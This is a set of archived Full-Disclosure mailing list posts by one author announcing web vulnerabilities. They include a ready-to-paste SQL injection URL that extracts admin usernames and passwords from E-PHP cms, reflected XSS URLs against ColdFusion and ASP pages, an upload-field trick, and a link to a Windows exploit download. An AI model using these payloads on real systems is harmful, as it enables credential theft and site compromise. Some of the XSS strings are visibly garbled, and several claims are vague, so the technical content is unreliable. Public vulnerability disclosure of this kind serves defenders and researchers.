[Full-disclosure] E-PHP cms SQL Injection Vulnerability
E-PHP cms SQL Injection Vulnerability

# Discovered By: SaiedHacker
Group: HackeranShiraz Security Team
Web Address: www.HackeranShiraz.Com
E-mail: saiedhackeri...@yahoo.com
Creator: http://ephpscripts.com

# Demo Exploit:
http://ephpscripts.com/demo/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin

# Exploit:
http://Target/cms/browsecats.php?cid=-12%20union%20select%200,concat(es_username,0x3a,es_password),2,3%20%20from%20esnm_admin

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Windows Command Processor Vulnerability
In The Name of God

Discover: SaiedHacker

Tested on:
Windows XP Service Pack2 (all version)
Windows XP Service Pack1 (all version)

Visual Basic code exe dump file:
http://saiedhacker.persiangig.com/Code.zip

Thanks to my best friends: Arsham Hacker, SiaHacker

HackeranShiraz Security Team
[EMAIL PROTECTED]
www.SaiedHackerPro.PersianBlog.IR
www.SaiedHackerPro.MyPersianBlog.Com
[Full-disclosure] New Problem in Index.cfm
In The Name Of God

Discoverer: SaiedHacker
Group: HackeranShiraz
Critical Level: Dangerous

This matter happens in index.cfm when we want to run some specific functions such as action, event, and a hacker can start attacks such as an XSS attack by using simple script or HTML code.

Exploit:
Http://www.Site.com/path/index.cfm?action=script
Http://www.Site.com/path/index.cfm?event=script
Http://www.Site.com/path/index.cfm?fuseaction=script

Xss:
Http://www.Site.com/path/index.cfm?action=scriptalert(SaiedHacker);/script
Http://www.Site.com/path/index.cfm?event=scriptalert(SaiedHacker);/script
Http://www.Site.com/path/index.cfm?fuseaction=scriptalert(SaiedHacker);/script

Have fun
[EMAIL PROTECTED]
www.SaiedHackerPro.PersianBlog.com
[Full-disclosure] New problem in Upload section in ASP service
In The Name Of God

Group: HackeranShiraz
Discoverer: SaiedHacker

This problem causes errors in ASP service.
This problem is because of not checking the input data well in the uploading image files section.
When the user is choosing an image file in the uploading section, it's possible to pass the input data checking by injecting some characters and we can easily cause the system

Exploit:
In the uploading field we can type this code:
C:\.jpg
Then press the upload button.

Web: http://www.SaiedHackerPro.PersianBlog.com
E-mail: [EMAIL PROTECTED]
[Full-disclosure] New XSS attack to Microsoft service(ASP)
In The Name Of God

Group: HackeranShiraz
Discoverer: SaiedHacker

We have found a security problem in Microsoft service (ASP). This problem is a type of XSS attack and occurs while processing the information. We can cause the problem by a simple (script) code.

Exploit:
Http://www.Victim.com/message.asp?msg=scriptalert("SaiedHacker");/script
Http://www.Victim.com/message.asp?msg=script%20language=_vbscript_msgbox("SaiedHacker")/script

Have time of your life
[EMAIL PROTECTED]
www.SaiedHackerPro.persianBlog.com